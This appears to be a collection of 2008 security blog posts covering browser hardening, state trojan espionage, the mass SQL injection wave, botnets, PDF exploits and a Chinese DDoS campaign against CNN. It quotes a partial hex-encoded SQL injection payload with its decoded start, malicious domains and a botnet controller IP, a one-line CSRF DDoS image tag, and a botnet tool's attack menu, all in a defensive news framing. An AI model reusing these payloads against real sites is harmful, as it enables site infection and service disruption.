How to secure your browser

Even if you recognize and ignore phishing emails, statistically, sooner or later you will visit an infected website. Previous research has shown that 0.45% of all websites are infected (your millage may vary). With all the recent drive-by infections, percentage might have increased. The internet is becoming a bad neighborhood. Email attachments aren't the biggest concern for viruses anymore. It's your browser now. So let's see how to protect ourselves.

Some of my old tips :

• Using the browser as a non-administrator account or within a Sandbox (free tools such as AMUST Defender or Sandboxie)
• Use a host-based firewall that blocks inbound and outbound connections per application.
• Patch your system, not only the operating system and browser, but also plug-ins and non-browser applications. Several tools exist that make this assessment easier. One of these tools is the Secunia Software Inspector
• Disabling JavaScript might be another very effective method to stop attacks. Most attacks we observed did need JavaScript to be enabled. Disabling JavaScript, however, might not be feasible as it would severely impact the functionality of many legitimate web sites. Some tools address this problem by globally disabling JavaScript, but selectively enabling it for certain trusted site. NoScript for the Firefox browser is an example of such a tool.
• Use openDNS as it provides some anti-phishing protection
  
• Don't be mainstream: The tests we conducted show that a simple but effective way to remove yourself as a targeted user is to use a non-mainstream application, such as Opera. As mentioned above, despite the existence of vulnerabilities, this browser didn’t seem to be a target.

Let add the tips from TSSCI security:

CERT has an excellent document on Securing your web browser! They cover IE, Firefox, and Safari — three secure references for the three most popular browsers.

However — as good CERT’s guide is, you won’t want to miss our past blog posts on safe/secure browsing, which are stacking up like hot-cakes:

• 8 Firefox extensions towards safer browsing
• Firefox + httpOnly? While we’re at it
• Client-side attacks: Protecting the most vulnerable
• Protecting the systems - Day 12 ITSM Vulnerability Assessment techniques
• Firefox 3 first impressions
• Security and safe browsing for Firefox

Out of interest, I wanted to have another look at some browser statistics. Diversity is good and Firefox is still my favorite browser. Firefox made some good progress but has stagnated (or stabilized) for the last 6 months. Of course, Firefox 3 might tip the balance a little more. I have tested it and it's rendering is really fast. I haven't switched completely as since it's still a beta. Pick your favorite poison.

2008	IE7	IE6	IE5	Fx	Moz	S	O
March	21.9%	30.1%	1.1%	37.0%	1.1%	2.1%	1.4%
February	21.5%	30.7%	1.3%	36.5%	1.2%	2.0%	1.4%
January	21.2%	32.0%	1.5%	36.4%	1.3%	1.9%	1.4%

2007	IE7	IE6	IE5	Fx	Moz	S	O
December	21.0%	33.2%	1.7%	36.3%	1.4%	1.7%	1.4%
November	20.8%	33.6%	1.6%	36.3%	1.2%	1.8%	1.6%
October	20.7%	34.5%	1.5%	36.0%	1.3%	1.7%	1.6%
September	20.8%	34.9%	1.5%	35.4%	1.2%	1.6%	1.5%

Germany caught spying on other countries with Trojans

Let take a trip back in time. In September, Germany accused China of cyberespionage. Now it seems that Germany was also using Trojans to eavesdrop on the communication of other countries. It's excuse? The war on terror!

Eight months after the nation's chancellor accused China of information attacks, Germany now faces criticism over its intelligence agency's use of software designed to spy on other countries' officials.

The latest incident, which began in June 2006, involved Germany's intelligence agency -- the Bundesnachrichtendienst (BND) -- launching an information attack against the Ministry of Commerce and Industry of Afghanistan, ostensibly an ally, according to media reports. Using a Trojan horse, the intelligence agents were able to read an Afghan government official's e-mail, including his correspondence with a reporter working for the German news magazine Der Spiegel, and data stored on the compromised PC's hard drive. The German Constitution protects the secrecy of telecommunications, but BND's legal counsel concluded that, because the messages were stored communications, they did not fall under the constitutional protection, Der Spiegel reported.

The operation ended on November 2006, when a whistleblower sent a letter to his superiors warning of the surveillance, the magazine reported. In February 2008, an anonymous BND employee notified two members of Germany's parliament of the intelligence agency's wiretapping activities. The incident only recently came to light during a Parliament hearing two weeks ago.

German's Interior Minister Wolfgang Schaeuble raised the specter of terrorism during a TV interview to defend the cyber-espionage tactics as necessary. "It's about a few isolated cases," he said, according to an Associated Press report. (Source: Securityfocus)

The article from The Spiegel mentioned some interesting parts

It all began in a small unit in the BND's Division 2. The department is responsible for "technical procurement" -- in other words, obtaining information with technical means, which mainly involves the wiretapping of telecommunications, called "signals intelligence" in industry jargon. In 2006, Division 2 consisted of 13 specialist departments and a management team (Department 20A), employing about 1,000 people. The departments are known by their German acronyms, like MOFA (mobile and operational telecommunications intelligence gathering), FAKT (cable telecommunications intelligence gathering) and OPUS (operational support and wiretapping technology).

In early June 2006, the OPUS team in department 26E launched an intelligence attack against Afghanistan. The details could have been taken from a Hollywood thriller, and the scope of the operation was far greater than has been revealed to date. According to the BND's secret allocation of responsibilities, OPUS is in charge of "technical and operational attacks on IT systems," a more or less accurate description of its agents' work.

So you see, not only China has a cyberintelligence division.

Related articles:

• Another example of an targeted attack: Tibet protests. (UPDATED)
• Collection of information on Cyberwarfare and the recent targeted attacks (updated)
• Targeted attacks might be using office 0-day
• Targeted attack on US nuclear arms lab succeeded
• The USCC report about chinese espionage
• Stopping targeted attacks, why signatures are not enough anymore
• World's first Cyber Coldwar soon in a theater near you

Podcast: AudioParasitics Episode 33 - Part 1 of 2 - Defcon's 'Race to Zero' contest

Episode 33 - Part 1 of 2 - Dave and Jim Discuss Defcon's upcoming 'Race to Zero' contest (Defcon 16), The McAfee S.P.A.M Experiment, and the 2008 RSA conference.

Podcast: Blue Box #78: Cisco IP phone vulnerabilties, WiFi handset insecurity, IETF security-related news, VoIP security news

A new Bluebox has been released:

Download the show here (MP3, 17MB) or subscribe to the RSS feed to download the show automatically.

Show Content:

• 00:20 - Intro to the show, contact information and how to provide comments. Welcome to all the new listeners - and to all those listeners who have been here for so long!
• new comment line +1-415-830-5439
• Special Edition #23 with Sonus Networks
• Squawk Box podcast about voice phishing – also this article Vishing: The Latest, and Greatest, Security Concern
• Cisco: Cisco Unified IP Phone Overflow and DoS Vulnerabilities and Dustin Trammell’s coverage
• ZDNet: Design flaw in wireless VoIP handsets endanger the enterprise followed by Cisco confirms vulnerability in 7921 WiFi IP phone
• Voice of VOIPSA: Slides about P2PSIP security new available
• Voice of VOIPSA: RUCUS mailing list & BOF
• Voice of VOIPSA: End-to-end VoIP security using DTLS-SRTP
• Also a whole bunch on SIP Identity
• SIP Torture Tests for IPv6 now out in RFC 5118
• SIP Usage Scenarios Similar to SPIT
• SPEERMINT Security BCPs
• SIP Identity Baiting Attack
• Concerns around Applicability of RFC 4474
• VoIP Hopper 0.9.9 released (site ) – Thanks to Frank Leonhardt for the info.
• VoIP News: Is Someone Listening to Your VoIP Calls? (linked to from ZDNet )
• ZDNet: Cracking GSM
• TMCnet- Practicing Safe OCS
• TMCnet- Security Attack of the Day (Tom Cross starts blogging for TMCnet)
• Speaking of Tom, Techtionary.com Releases SIP Security Checklist
• Voice of VOIPSA: SIPTap Author forms VoIP Security Company (by Craig Bowser!)
• Voice of VOIPSA: Underpowered Hardware
• Project Spider – about SPIT
• CBC: Bell recovers stolen data on 3.4 million customers

Short Movie: When technology takes over our life

A short movie. When you don't control your data anymore. A scary future. Makes you think about putting all functions onto one card (payment, identity, car access, house access,...). It seems so convenient but ......

PS, the end is not suitable for young viewers.


..

WAFs , PCI and the United Nations SQL injection

Last week, the UN seemed to be amongst the websites falling victim to the SQL injection attack and it wasn't their first time. Reason? They never fixed the code and put a web application firewall in front of it:

One of my early Hackademix posts was about SQL injection vulnerabilities exploited to deface the United Nations main web site. In a later update I explained how, rather than fixing their holes properly, the U.N. technicians deployed a pretty useless Web Application Firewall, masking the most obvious attack surface but keeping their sites just as vulnerable as before.
...

The default search pattern of this tool is inurl:".asp" inurl:"a=": in English, “those web pages developed with Microsoft Active Server Pages technology and accepting query string parameters”. Unsurprisingly, this profile matches the original, still unpatched U.N. SQL injection; as I already said reporting the first accident, I believe crackers primarily target ASP sites (even though they are relatively few nowadays) because of the poor coding standards often shown by ASP coders, who usually have a Visual Basic desktop programming background and are less aware of web application security.

At any rate, some simple googling reveals that some U.N. sites are still infected, while UK Government sites have been “cleaned up”.
The sad truth, though, is that even those “clean” sites are still vulnerable, hence they could be reinfected at any time: some people just never learn… (Source: hackademix.net)

So this reminded me of the PCI 6.6 that was disclosed and gave some heated discussions about WAFs. I guess that it can buy you some time but a WAF is not a miracle worker. Fix the code !!!

Previous articles:

• Followup on the 1.js sql injection wave
• Mass malware SQL injections still continuing and the number of Belgian sites infected
• Mass website infections from January solved
• More drive-by infections and iframe SEO poisening
• The source code of the Javascript injection attack of last week
• Attack of the Killer iframes and the javascript infections

New Variant of Kraken bot on the loose

In the beginning of the month, there was a lot of discussion when a new botnet was discovered that claimed to be bigger and more dangerous then Storm Worm: The Kraken botnet. But soon afterwards, the discussion fell silent as all attention went back to Storm Worm in it's video codec spam wave. So, how is Kraken doing today? Quite well it seems. Here is some news from Threatexpert.com:

A new variant of Kraken/Bobax bot, firstly seen in the wild on 14th April 2008, seem to be gaining a bit of power: over the last week-end, our ThreatExpert system has received around 50 of unique samples of it, and we're still getting them at the same pace - 20-25 of new samples a day.

...

In some way, we may call this new feature of the bot as an "Artificial English Word Generator", that follows English grammar rules and produces words that look like most of other words. For example, compare "confusulent" or "pritation" with something like "ktjptrca".

What is it for? Probably, to evade SPAM filters, or any other algorithms that can distinguish a random word by locating weird or non-common combinations of characters. If no rule or algorithm can be built to distinguish such word, then it cannot be detected, and therefore, blocked.

The bot constructs an HTTP package with the encrypted contents that is MIME-encoded and is presented as a random MIME-type archive in the HTTP header.

Kraken/Bobax POSTs that HTTP package to its C&C servers (with the pseudo-random URLs), thus making it non-trivial to detect and block such traffic, as not much is left to "hook" in it.

...

As demostrated above, the new factor of "randomness" in this bot makes it extremely dangerous considering how serious is its effort in concealing its traffic in order to flow with no obstruction imposed by the firewalls.

The backdoor component is left intact in the new variant - its code was copy-and-pasted from the previous variant: the same commands, the same responses.

The SPAM engine and the email collector module are also identical to the previous variant.

Virustotal.com results are not very good considering only 9 out of 32 AV scanners (28.12%) can detect this threat, among which only two can actually identify this threat explicitly.

Read the full report.

Previous articles:

• Some more details on the 'Kraken' bot, fact or fiction?
• New botnet 'Kraken' is present in 50 out of Fortune 500
• Everything is increasing
• Paper on Botnets – The Silent Threat on the Internet
• Webcast: BotArmy Facts. Not Fiction.

Difference between ITIL v3 and ISO 20000

I know ITIL but I didn't hear about ISO 20000 before. So let's have a look at it and begin with the following:

Whitepaper: ITIL® V3 and ISO/IEC 20000 by Jenny Dugmore and Sharon Taylor

This outlines the differences between ITIL V3 and ISO/IEC 20000 from 'the perspective of each clause in the standard where the core 5 ITIL books either do not cover it or cover it differently. It does not cover changes that mean ITIL V3 is closer aligned to ISO/IEC 20000 than was ITIL V2. The table included within this white paper is an ISO/IEC 20000-1 centric document. It identifies clauses where there are notable differences between ISO/IEC 20000 and ITIL V3 that are not simply due to the different purposes of the two sets of documents.'

But isn't there any more information on ISO20000 itself? Well, let's go to ISO 20000 Central:

As described on other pages of this site, ISO 20000 is the international standard for IT Service management.

However, ISO 20000 itself is part of a much bigger picture, in that it aligns with ITIL, the IT Infrasture Library. This relationship is often illustrated via a diagram such as the one below:

Clearly, however, there is also a relationship with other management protocols and frameworks. This will be explored as additional features are added to this web portal.

Previous article:

• Some ITILv3 resources and the relation to information security

Hack.lu 2008 conference coming on the 22nd - 24th of October

There were some rumors that there wouldn't be a new Hack.lu. But luckily, the rumors weren't true. I happened to see this "small" announcement on their website last week.

Announcement: Yes there will be a hack.lu 2008. The date will be the 22-24 october in Luxembourg. Stay tuned we are about to assemble the bits and pieces. CfP will be send out 1st May. So prepare your submissions.

A three day conference in the center of Europe for bridging ethics and security in computer science.

Hack.lu is an open convention/conference where people can discuss about computer security, privacy, information technology and its cultural/technical implication on society. The aim of the convention is to: make a bridge of the various actors in the computer security world.

Marked in my calendar. Request to the manager underway.

Previous articles:

• Hack.lu was pwned in 15 minutes and a small review of the event
• MITMing a room full of security people @ Hack.lu
• Capture The Flag @ Hack.lu 2007
• Hack.lu day 1: honeypots, voip pentesting and exploiting anti-virus
• Hack.lu: start of day 1
• Hack.lu conference in just a few days

Targeted attacks using Acrobat's pdf and a little new trick

In the beginning of February, a critical security patch for Acrobat Reader was released. And now it's being actively used in targeted attacks. Here is an interesting analysis from SANS:

Ever since the end of March, beginning of April, the amount of samples seen in the wild has significantly increased. Interestingly enough, there is almost no "public, widespread" exploitation. All reports are limited to very specific, targeted attacks. However, due to the wide scope of these attacks, and the number of targets we know of, we feel a diary entry was in order. At this point in time, we are receiving more PDF samples from targeted attack victims per day than any other common file type (DOC, CHM, PPT). The threat agents, or attackers, are the same. They are just moving from other file types towards PDF, but are generally using the same control servers and similar backdoor families.

The files contain:
- an embedded trojan installer;
- a clean PDF file.

Once the file is opened in a vulnerable Acrobat Reader version, the backdoor will install, and the clean PDF file is opened in the user's browser. From a user experience, there are two possible methods of detection:

- If the file is opened in a patched Acrobat Reader, an error will be displayed that the file is corrupted;
- If the file is opened in a vulnerable Acrobat Reader, the user will see Acrobat Reader close and immediately reopen the valid PDF document.

Anti virus detection of these samples is usually very low heuristically. The below are detection results from a malicious PDF which had not been reported to an AV vendor yet. Note that these results vary per file.

The closing remarks were even more interesting, because it did contain a countermeasure, I wasn't aware of.

Acrobat Reader is proving to be an interesting target because users are not very much inclined to upgrade manually. The file format is relatively stable and users of Acrobat Reader 7 may not always feel a need to upgrade.

As such, we strongly recommend that you:

- Ensure your Acrobat Reader installations have been upgraded to version 8.1.2;
- Disable Javascript parsing through Edit>Preferences>Javascript, by disabling the 'Enable Acrobat JavaScript' option.

Read the full analysis @ SANS. Thank you Maarten.

Related articles:

• The dangers of Web 2.0: information gathering tactics 101
• This is how good the targeted attacks are getting
• Which non-executables files are targeted the most?
• Social engineering put to the test. How would your employee score?
• Another example of an targeted attack: Tibet protests. (UPDATED)
• Security.nl, Maarten, social engineering and targeted attacks
• Social engineering pentesting against your employees (UPDATED)
• Collection of information on Cyberwarfare and the recent targeted attacks (updated)

Why right brain people will take over the world

I used to consider myself as a 'leftie'. A logical and analytical person with not much (need for) creativity. Most of the educational institutions have either exact sciences or creative curricula and the content is quite seperated.
You seldom see any courses about creativity or creative thinking when following exact sciences, which is a pity. Even if you are not a natural talent in either discipline, with some 'training' you could master the basics. They are not (or shouldn't) mutually exclusive. Even in IT or Engineering, some creativity can help you to think 'outside of the box' and come to solutions which you wouldn't be able to find using only logic. I consider creativity also an essential skill for good presentations. This was my epiphany of the last year.

You could also consider 'hacking' as a creative process, thinking about how to use technology in another way that everyone is using. So start using that other half of your brain !!!

My friend Karim started an interesting discussion about "The Beginner's mind".

Most of us have lost these abilities when gowning up. We’ve put the creative aspect away for only artists to use. Yet everyone should be the artist in it’s own line of work.

You may say that there is nothing creative about working in a regular business. But do you think that if there was no creativity within a business, that it could become innovative or differentiate itself within a given sector?

Within the zen teaching one often speaks of the “beginner’s mind” (or child’s mind). One who approaches life with a beginner’s mind is fresh, enthusiastic and open to a wide range of ideas. When one does not know what’s possible, one will be open to exploration/discovery. Unburdened by your fixed views/habits/…, one will see things more clearly.

Read his full post.

If you are interested in this topic, I can recommend the following book: A Whole New Mind: Why Right-Brainers Will Rule the Future.

The future belongs to a different kind of person with a different kind of mind: artists, inventors, storytellers-creative and holistic "right-brain" thinkers whose abilities mark the fault line between who gets ahead and who doesn't. Drawing on research from around the world, Pink outlines the six fundamentally human abilities that are absolute essentials for professional success and personal fulfillment-and reveals how to master them. A Whole New Mind takes readers to a daring new place, and a provocative and necessary new way of thinking about a future that's already here.

Updated with a part from Seth Godin: Really bad powerpoint Design:

Communication is the transfer of emotion.

Communication is about getting others to adopt your point of view, to help them understand why you’re excited (or sad, or optimistic or whatever else you are.)If all you want to do is create a file of facts and figures, then cancel the meeting and send in a report.

Our brains have two sides. The right side is emotional, musical and moody. The left side is focused on dexterity, facts and hard data. When you show up to give a presentation, people want to use both parts of their brain. So they use the right side to judge the way you talk, the way you dress and your body language. Often, people come to a conclusion about your presentation by the time you’re on the second slide. After that, it’s often too late for your bullet points to do you much good.

You can wreck a communication process with lousy logic or unsupported facts, but you can’t complete it without emotion. Logic is not enough.

Related articles:

• Looking at presentations
• How to hack life: how to be more efficient and productive
• Don't make life difficult
• Larry Lessig: How creativity is being strangled by the law (video)

Chinese attackers might have another go at CNN, another planned attack on the 25th 8pm (UPDATED)

Kudos to TheDarkVisitor for reporting this, even if it's not confirmed.

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issuses regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don’t forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online, they won’t be able to withstand us

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people. (TheDarkVisitor)

And the way they will do it will be very simply. By just asking people to surf to a website. Jeremiah was just referencing this kind of attack a few days ago and this is the real world example.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five,six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:

Yes. It loads an iframe: And then it reloads itself every five seconds:

(TheDarkVisitor)

I don't know what theyare hoping to accomplish as this attack can be easily avoided in the same way as before: Filtering or Blocking certain netblocks of China.

BUT if someone would throw in a botnet or two, that is another matter. And it seems, they have released the tools, just for the occasion: NetBot Attacker Anti-CNN Tool (Arbor Networks)

As I noted last night, another, third tool (that I know of) dedicated for Chinese who are upset and want to attack CNN has been released. The folks at Hackeroo have released a Netbot Attacker Anti-CNN version, free of charge, for folks to use. Normally Netbot Attacker is a commercial tool, but this is a focused version.

Netbot Attacker provides a simple Windows UI for controlling a botnet, reporting and managing the network, and commanding attacks. So far nothing special or new there. It ships as a simple RAR file with two pieces: an INI file (see below, partially edited and obscured) and a simple EXE.

...

A rough translation - provided with the bot - would be:

Common Attack:
SYN Flood ICMP Flood UDP Flood UDP Small TCP Flood TCP Mult-Connect
Web Attack :
NoCache Get Flood CC Attack Http GET Nothing
Speical Attack:
CQ Game Attack Route Attack Smart Auto Attack
Combine Attack:
SYN+UDP Flood IACMP +TCP Flood UDP Small+TCP Connect

Note that there’s no mention to the average user that they’ll be able to access your PC now that you’re helping the cause.

It is unclear to me how much this specific tool is used compared to the others. In the end, the effect is the same, however, which is to try and drive an adversary offline with a packet flood.

Read the full analysis from Jose Nazario here including with screenshots.

The attack might go through in the next hours. Time to keep an eye on those Netcraft statistics. More news to follow.

By the way, apparently there was a third victim in this whole discussion. Slideshare.net also suffered a major DDoS peaking at 2.5 GBps last week.


UPDATE (25/04/2008): Or the attack has yet to really start, or CNN is taking the attack really well. Funny thing is when looking at the Netcraft statistics, that we only see some performance drops measured from Italy only. There were some spikes (response times) on that graph. During the last attack, we saw spikes on all of the graphics.




Previous articles:

• I don't need a botnet, just me and some friends with CSDDoS
• How did The Sports Network recover from the chinese defacement?
• Update on CNN.com attacks, slightly down but (not) defaced (UPDATED)
• DDoS Attack on CNN, cancelled or delayed? An overview.

Followup on the 1.js sql injection wave

It seems that the number of infected pages has mounted up to 510.000 pages (Source: F-Secure). Looking at the Belgian pages, it seems to have become 369 infected (injected) sites.

As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.

Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…

Which when decoded becomes:

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them. (Source: F-Secure)

Input validation people !!! Check out the OWASP Top Ten. SQL injection is back on spot nr. 2.

UPDATE (25/04/2008): SANS ISC is also giving some more details:

The crew over at shadowserver has published additional information related to SQL injected sites. They included the botnet controllers IP address 61.188.39.214 and a content based snort signature for the bot control traffic that is not ip dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313

They have hit city websites, commercial sites and even government websites. This type of injection pretty much null and voids the concept of “trusted website”. or "safe sites".

The register covered it stating their search returned 173k injected results:
http://www.theregister.co.uk/2008/04/24/mass_web_attack/
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more then one time.

Lou a self described “accidental techie” has been discussing it as they have been reinjecting this into his database/website “every other day”. http://www.experts-exchange.com/Database/MySQL/Q_23337211.html

Previous articles:

• Mass malware SQL injections still continuing and the number of Belgian sites infected
• Mass website infections from January solved
• More drive-by infections and iframe SEO poisening
• The source code of the Javascript injection attack of last week
• Attack of the Killer iframes and the javascript infections

Another Zero Day in Quicktime

Beware of opening Quicktime movies !!!

US-CERT is aware of a public report of a new vulnerability in Apple QuickTime. The report indicates that if a user opens a specially crafted QuickTime file, an attacker may be able to execute arbitrary code. This vulnerability may have several attack vectors, such as visiting a malicious or compromised website. US-CERT is currently investigating this report and will provide additional details as needed.

US-CERT encourages users to use caution when opening QuickTime files, and apply the best security practices described in the Securing Your Web Browser document, to help mitigate the risks. (Source: US CERT)

There is no patch as we speak so be careful. How many more of these security leaks will we see in quicktime?

UPDATE: The (original) GNUCITIZEN article with a movie on the exploit.

Related articles:

• Patch mania, it's not just Patch Tuesday
• Massive amounts of vulnerabilities are making a lot of PCs vulnerable
• Quicktime flaw (AGAIN)
• Oracle security patches are seldom applied
• Flood of vulnerabilities coming our way
• Adobe Acrobat and Reader security patch finally released
• QuickTime update closes security hole

Airport Security: All your data are belong to us

If you recently took a plane at the Schiphol airport (Amsterdam), it would have been possible that the data from your mobile phone, laptops, USB sticks or other media would have been copied and "searched". The reason: searching for distribution of childporn. (Source: security.nl)

It was only a pilot project because passengers are alleged to transport them physically out of fear for detection on the internet. Especially tourists that have been to Thailand, Brazil, Sri Lanka and Vietnam were under the loop.

The border police didn't tell what the search criteria were but they confirmed that laptops, digital cameras and cd-roms were inspected.

I already knew that they did these 'digital' searches at the US borders. It's seem to be spreading to other countries now. At least, they didn't use the terrorism wildcard.

I don't condone child porn at all but this practice has consequences. I have signed a NDA with my clients and I have a contractual and legal obligation to not disclose their information. I probably cannot refuse these kind of searches since that would also put me between a rock and a hard place.

The only alternative is that I can only travel with a cleanly installed laptop and use a (SSL) VPN to access my data. But with the prices of hotspots (in hotels), that's a pricey way of working.

This is so easy to circumvent. Just solder an USB flash chip to the PCB of your laptop and make it look a part of the laptop. It's of course not electronically connected and I doubt that they will disassemble the laptop and inspect it. Afterwards, remove and resolder the chip back onto the pendrive PCB. Maybe not the best example but these things are so small, that they seem easy to hide.

Does your IT staff has spare laptops ready for your travelers? Do you have a security policy that takes this into account? These kind of search practices has a major impact on the protection of our confidential information and the way our mobile users work.

Wanted: experts on security issues of OS virtualization technologies

ISSA-BE has received a request from Dr. Trimintzios from ENISA to support them in investigating security issues of OS virtualization technologies.

ENISA is planning to establish a Virtual Expert Group (no physical meetings required) to study the Security issues in Operating System Virtualisation Technologies. The work of the group is expected to result in a position paper which will be published by ENISA, while all the members selected for the group will be designated as co-authors.
The paper is aimed at end users of these technologies, policy and decision makers. I would like to ask you for your help in identifying experts for this new group.

Please inform anyone within or outside your organisation who has expertise on this topic and who would be interested in participating. Obviously if you feel you have the relevant expertise please propose yourself. The detailed Term of Reference for the Virtual Group and the ENISA position paper on security issues in OS virtualization technologies is available here.

For applications and further information please contact Dr. Simone BALBONI. Please note that we expect the paper to make a considerable impact in the press.

So if you have some expertise in this area, any help would be appreciated.

I don't need a botnet, just me and some friends with CSDDoS

Jeremiah started a discussion about CSRF DDoS and why it could become a real threat.

It’s with this context in mind that I share my thoughts about DDoS attacks carried out by way of CSRF. Also, I take no credit for the novelty of this attack as its been rumored around in various circles for years. I’m merely drawing attention to the issue. Here’s the basic exploit code that a bad guy would need:

<* IMG SRC=”http://victim/” >

Simple enough? All the bad guy needs to do is post the HTML snippet to a large number of public websites where other users would come in contact with it. These websites could be message boards, guest books, WebMail, blog comments, social networks, chat rooms, and so on. All the types of websites quite popular, free to sign-up, and easy to automate (save for CAPTCHA). The code instructs a users browser to make an HTTP request to an arbitrary location (victim) invisibly and behind the scenes with connections originating from all over. This makes the attack difficult to stop and obviously the more frequented the websites are the more effective it is. (Source: Jeremiahgrossman)

Well, this might just be a theoretical attack or is it? I remembered Dancho Danchev posting the following piece (about the CNN attack):

What if a simple script that is automatically refreshing CNN.com multiple times in several IFRAME windows, gets embedded at thousands of sites, and then promoted at hundreds of forums, with a single line stating that - "If you're a patriot, forward this to all your friends"? Now, what if this gets coordinate to happen at a particular moment in time? This is perhaps the most realistic scenario to what exactly happened with CNN.com, and data speaks for itself, in fact I can easily state that the bandwidth generated by this massive PSYOPs campaign is greater than the one used by a botnet that's also been DDoS-ing CNN.com.

All of these sites are basically refreshing CNN.com every couple of seconds, thereby wasting the sites's bandwidth, the only flaw of this attack approach compared to a botnet, is that all the participating hosts are Chinese, and therefore as NetCraft pointed out, CNN blocked access to certain countries, take these countries as China for instance. (Source: ddanchev)

CSDDoS is just a term suggested in one of the comments of Jeremiah's post. Great, another IT acronym for the dictionary! ;-)

Reading the text above, the attack doesn't sound so theoretical anymore.

So, how long before blocking large netblocks like China won't work anymore?

Another interesting read is the Puppetnets (Misusing Web Browsers as a Distributed
Attack Infrastructure) paper from "Systems and Security Department, Institute for Infocomm Research, Singapore":

ABSTRACT

Most of the recent work on Web security focuses on preventing attacks that directly harm the browser’s host machine and user. In this paper we attempt to quantify the threat of browsers being indirectly misused for attacking third parties.
Specifically, we look at how the existing Web infrastructure (e.g., the languages, protocols, and security policies) can be exploited by malicious Web sites to remotely instruct browsers to orchestrate actions including denial of service attacks, worm propagation and reconnaissance scans. We show that, depending mostly on the popularity of a maliciousWeb site and user browsing patterns, attackers are able to create powerful botnet-like infrastructures that can cause significant damage. We explore the effectiveness of countermeasures including anomaly detection and more fine-grained browser security policies.

First batch of Shmoocon 2008 presentations online

I haven't seen too many people post this yet but there are already some presentations online.
Get them here.

Now to wait impatiently for the videos and the rest of the presentations to come online.

Related posts:

• Podcast: Hak.5 Episode 3x08 -- Shmoocon Special
• 802.11 Wireless attack paper and updates from Blackhat on PEAP/EAP-TLS issues
• Hak5 video Podcast about ShmooCon 2007: Jikto, Dead drives and Lockpicking
• ShmooCon2007 videos are online
• How to watch security conferences on your ipod
• Presentations of Blackhat Europe 2008
• Official Defcon 15 recordings online (updated)
• 24C3: Recorded videos from the congress are already available

The dangers of Web 2.0: information gathering tactics 101

Well, we don't even have to talk about Web 2.0 or social networks. A byproduct of the technology age we live in is information. We all have or leave an extensive information waste footprint without even realizing it. This can be (mis)used for identity theft or social engineering. It's has only been a few months since I mentioned maltego. The tool that has migrated from a webbased application to a downloadable GUI still leaves Google behind when it comes to personal information gathering.

Since the webbased application has been taken offline, I downloaded the GUI and played around with it. Of course, I used it on my own name and on my company and I can say only 'WOW'. Just try it, you'll be surprised of the information out there.

What is it?

• Maltego is a program that can be used to determine the relationships and real world links between:
  • People
  • Groups of people (social networks)
  • Companies
  • Organizations
  • Web sites
  • Internet infrastructure such as:
  • Domains
  • DNS names
  • Netblocks
  • IP addresses
  • Phrases
  • Affiliations
  • Documents and files
• These entities are linked using open source intelligence.
• Maltego is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.
• Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate - making it possible to see hidden connections.
• Using the graphical user interface (GUI) you can see relationships easily - even if they are three or four degrees of separation away.
• Maltego is unique because it uses a powerful, flexible framework that makes customizing possible. As such, Maltego can be adapted to your own, unique requirements.

What can Maltego do for me?

• Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter.
• Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
• Maltego provide you with a much more powerful search, giving you smarter results.
• If access to "hidden" information determines your success, Maltego can help you discover it

Look at the screenshots here.
Download here.
Download you API key here.

Your security policy and awareness program should take this into account. To get an idea of the issue and some suggested countermeasures, read ENISA's paper on "Security Issues and Recommendations for Online Social Networks. (Thanks to ISSA BE for mentioning this paper).

Introduction.

